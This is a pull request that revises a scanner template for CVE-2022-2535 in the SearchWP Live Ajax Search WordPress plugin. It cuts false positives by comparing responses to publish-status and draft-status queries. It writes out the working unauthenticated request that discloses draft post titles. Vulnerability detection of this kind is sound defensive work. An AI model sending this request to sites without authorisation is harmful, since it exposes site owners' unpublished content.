### PR TITLE
Fix FP CVE-2022-2535.yaml

### DIFF
--- a/http/cves/2022/CVE-2022-2535.yaml
+++ b/http/cves/2022/CVE-2022-2535.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-2535
 
 info:
   name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
-  author: r3Y3r53
+  author: r3Y3r53,daffainfo
   severity: medium
   description: |
     The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
@@ -31,15 +31,21 @@ info:
   tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "text/html")'
-          - 'contains(body, "searchwp-live-search-result")'
+          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'contains(content_type_1, "text/html") && contains(content_type_2, "text/html")'
+          - 'contains(body_1, "searchwp-live-search-result") && contains(body_2, "searchwp-live-search-result")'
+          - "len(body_1) != len(body_2)"
         condition: and
 # digest: 4a0a00473045022011b6ddb96bff3d8683515d93725995406d13f48c88b94b814b59013668150c33022100d951a09e8be7f217b74b5fee347764a92897295efba1283778d30e0cf7f21aee:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
The plugin still used `/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=xxx` endpoint but in the fixed version even though we changed the post_status to another status (e.g: draft, publish, etc.) the content doesnt change. That's why in this commit i added more post status and then compare the len(body)